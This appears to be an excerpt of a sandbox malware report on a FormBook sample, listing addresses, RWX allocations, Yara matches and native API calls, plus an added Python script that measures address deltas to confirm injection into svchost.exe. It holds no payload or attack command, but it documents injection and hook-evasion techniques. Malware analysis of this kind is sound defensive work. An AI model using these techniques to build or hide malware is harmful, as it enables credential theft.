Source: C:\Users\Public\vbc.exe Code function: 9_2_00C87B00 9_2_00C87B00
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D02C9C 9_2_00D02C9C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CEAC5E 9_2_00CEAC5E
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CFFDDD 9_2_00CFFDDD
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6CD5B 9_2_00C6CD5B
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C90D3B 9_2_00C90D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3E0C6 12_2_00A3E0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A6D005 12_2_00A6D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A43040 12_2_00A43040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A5905A 12_2_00A5905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3E2E9 12_2_00A3E2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AE1238 12_2_00AE1238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3F3CF 12_2_00A3F3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A663DB 12_2_00A663DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A42305 12_2_00A42305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A8A37B 12_2_00A8A37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A47353 12_2_00A47353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A75485 12_2_00A75485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A51489 12_2_00A51489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A7D47D 12_2_00A7D47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A5C5F0 12_2_00A5C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4351F 12_2_00A4351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A86540 12_2_00A86540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A44680 12_2_00A44680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4E6C1 12_2_00A4E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AE2622 12_2_00AE2622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4C7BC 12_2_00A4C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AC579A 12_2_00AC579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A757C3 12_2_00A757C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00ADF8EE 12_2_00ADF8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A6286D 12_2_00A6286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4C85C 12_2_00A4C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A429B2 12_2_00A429B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AE098E 12_2_00AE098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A569FE 12_2_00A569FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AC5955 12_2_00AC5955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AF3A83 12_2_00AF3A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AECBA4 12_2_00AECBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3FBD7 12_2_00A3FBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00ACDBDA 12_2_00ACDBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A67B00 12_2_00A67B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00ADFDDD 12_2_00ADFDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A70D3B 12_2_00A70D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4CD5B 12_2_00A4CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A72E2F 12_2_00A72E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A5EE4C 12_2_00A5EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A50F3F 12_2_00A50F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A6DF7C 12_2_00A6DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009C9A5 12_2_0009C9A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00088C7B 12_2_00088C7B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00088C80 12_2_00088C80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00082D87 12_2_00082D87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00082D90 12_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00082FB0 12_2_00082FB0
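The function listing above appears twice, once for vbc.exe (PID 9) and once for svchost.exe (PID 12), and every address in the second copy is the first copy shifted by a constant: the 0x00C5xxxx block of vbc.exe reappears at 0x00A3xxxx, and vbc.exe's 0x00400000 image reappears at 0x00080000, the RWX region in PID 12 that the Yara scan under E-Banking Fraud flagged as FormBook. The script below is an added example, not part of the report, that recovers those constants from a subset of the addresses above by counting pairwise differences: code present in both processes produces one delta repeated once per shared function, while unrelated addresses never pile up. The stubs listed later under "Contains functionality to call native functions" (NtCreateFile, NtMapViewOfSection and so on at 0x00C4F9F0 onward) sit just below the 0x00C5xxxx block; that placement is consistent with FormBook's documented habit of mapping a private copy of ntdll.dll to bypass user-mode hooks, which is an interpretation offered here and not something the report itself states.

```python
from collections import Counter

# Function start addresses copied from the listing above (a subset), keyed by the
# sandbox's process ids: 9 = C:\Users\Public\vbc.exe, 12 = C:\Windows\SysWOW64\svchost.exe.
VBC_PID9 = [
    0x00401030, 0x0041C130, 0x0041C9A5, 0x0041BABE, 0x00408C7B, 0x00402D87, 0x00402FB0,
    0x00C5E0C6, 0x00C63040, 0x00C7905A, 0x00CDD06D, 0x00C8D005, 0x00C5E2E9, 0x00D01238,
    0x00C863DB, 0x00C95485,
]
SVCHOST_PID12 = [
    0x0009C9A5, 0x00088C7B, 0x00082D87, 0x00082FB0,
    0x00A3E0C6, 0x00A43040, 0x00A5905A, 0x00A6D005, 0x00A3E2E9, 0x00AE1238,
    0x00A663DB, 0x00A75485, 0x00A72E2F,
]


def delta_histogram(addrs_a, addrs_b):
    """Count every pairwise difference a - b. Code loaded in both processes at different
    bases yields one delta repeated once per shared function."""
    return Counter(a - b for a in addrs_a for b in addrs_b)


def shared_code_deltas(addrs_a, addrs_b, min_support=3):
    """Deltas backed by at least min_support function pairs, best supported first."""
    return [(delta, n) for delta, n in delta_histogram(addrs_a, addrs_b).most_common()
            if n >= min_support]


def rebased_pairs(addrs_a, addrs_b, delta):
    """(a, b) pairs with a == b + delta: the same function seen at two load addresses."""
    b_set = set(addrs_b)
    return sorted((a, a - delta) for a in addrs_a if a - delta in b_set)


def unmatched(addrs_a, addrs_b, deltas):
    """Addresses in addrs_a that none of the candidate deltas maps onto addrs_b."""
    b_set = set(addrs_b)
    return sorted(a for a in addrs_a if not any(a - d in b_set for d in deltas))


if __name__ == "__main__":
    found = shared_code_deltas(VBC_PID9, SVCHOST_PID12)
    for delta, n in found:
        print(f"delta {delta:#x}: {n} functions shared")
        for a, b in rebased_pairs(VBC_PID9, SVCHOST_PID12, delta):
            print(f"  vbc.exe {a:#010x} -> svchost.exe {b:#010x}")
    leftovers = unmatched(VBC_PID9, SVCHOST_PID12, [d for d, _ in found])
    print("no counterpart in svchost.exe:", [f"{a:#010x}" for a in leftovers])
```

On the embedded subset the two deltas are 0x220000 (eight pairs) and 0x380000 (four pairs); the leftovers are functions the sandbox listed for only one of the two processes, which is expected when the emulator's function discovery stops at different points in each dump. The same approach works on any pair of function-address lists from two processes, and a single dominant delta between a dropper and a system process is a quick, tool-independent confirmation of injection.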
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E90000 page execute and read and write
Yara signature match
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A8373B appears 238 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A83F92 appears 108 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A3E2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00AAF970 appears 81 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A3DF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00CA3F92 appears 116 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00CA373B appears 228 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00C5E2A8 appears 59 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00CCF970 appears 80 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00C5DF5C appears 117 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 9_2_004185E0 NtCreateFile, 9_2_004185E0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00418690 NtReadFile, 9_2_00418690
Source: C:\Users\Public\vbc.exe Code function: 9_2_00418710 NtClose, 9_2_00418710
Source: C:\Users\Public\vbc.exe Code function: 9_2_004187C0 NtAllocateVirtualMemory, 9_2_004187C0
Source: C:\Users\Public\vbc.exe Code function: 9_2_004187C2 NtAllocateVirtualMemory, 9_2_004187C2
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C500C4 NtCreateFile,LdrInitializeThunk, 9_2_00C500C4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50048 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_00C50048
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50078 NtResumeThread,LdrInitializeThunk, 9_2_00C50078
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C507AC NtCreateMutant,LdrInitializeThunk, 9_2_00C507AC
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F9F0 NtClose,LdrInitializeThunk, 9_2_00C4F9F0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F900 NtReadFile,LdrInitializeThunk, 9_2_00C4F900
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_00C4FAD0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_00C4FAE8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_00C4FBB8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_00C4FB68
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC90 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_00C4FC90
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_00C4FC60
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_00C4FDC0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FD8C NtDelayExecution,LdrInitializeThunk, 9_2_00C4FD8C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_00C4FED0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FEA0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_00C4FEA0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FFB4 NtCreateSection,LdrInitializeThunk, 9_2_00C4FFB4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C510D0 NtOpenProcessToken, 9_2_00C510D0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50060 NtQuerySection, 9_2_00C50060
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C501D4 NtSetValueKey, 9_2_00C501D4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C51148 NtOpenThread, 9_2_00C51148
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5010C NtOpenDirectoryObject, 9_2_00C5010C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F8CC NtWaitForSingleObject, 9_2_00C4F8CC
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C51930 NtSetContextThread, 9_2_00C51930
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F938 NtWriteFile, 9_2_00C4F938
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FAB8 NtQueryValueKey, 9_2_00C4FAB8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FA50 NtEnumerateValueKey, 9_2_00C4FA50
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FA20 NtQueryInformationFile, 9_2_00C4FA20
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FBE8 NtQueryVirtualMemory, 9_2_00C4FBE8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FB50 NtCreateKey, 9_2_00C4FB50
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50C40 NtGetContextThread, 9_2_00C50C40
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC48 NtSetInformationFile, 9_2_00C4FC48
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC30 NtOpenProcess, 9_2_00C4FC30
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C51D80 NtSuspendThread, 9_2_00C51D80
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FD5C NtEnumerateKey, 9_2_00C4FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A300C4 NtCreateFile,LdrInitializeThunk, 12_2_00A300C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A307AC NtCreateMutant,LdrInitializeThunk, 12_2_00A307AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F9F0 NtClose,LdrInitializeThunk, 12_2_00A2F9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F900 NtReadFile,LdrInitializeThunk, 12_2_00A2F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FAB8 NtQueryValueKey,LdrInitializeThunk, 12_2_00A2FAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk, 12_2_00A2FAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_00A2FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk, 12_2_00A2FBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_00A2FB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FB50 NtCreateKey,LdrInitializeThunk, 12_2_00A2FB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk, 12_2_00A2FC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FD8C NtDelayExecution,LdrInitializeThunk, 12_2_00A2FD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_00A2FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_00A2FED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FFB4 NtCreateSection,LdrInitializeThunk, 12_2_00A2FFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A310D0 NtOpenProcessToken, 12_2_00A310D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30060 NtQuerySection, 12_2_00A30060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30078 NtResumeThread, 12_2_00A30078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30048 NtProtectVirtualMemory, 12_2_00A30048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A301D4 NtSetValueKey, 12_2_00A301D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3010C NtOpenDirectoryObject, 12_2_00A3010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A31148 NtOpenThread, 12_2_00A31148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F8CC NtWaitForSingleObject, 12_2_00A2F8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A31930 NtSetContextThread, 12_2_00A31930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F938 NtWriteFile, 12_2_00A2F938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FA20 NtQueryInformationFile, 12_2_00A2FA20
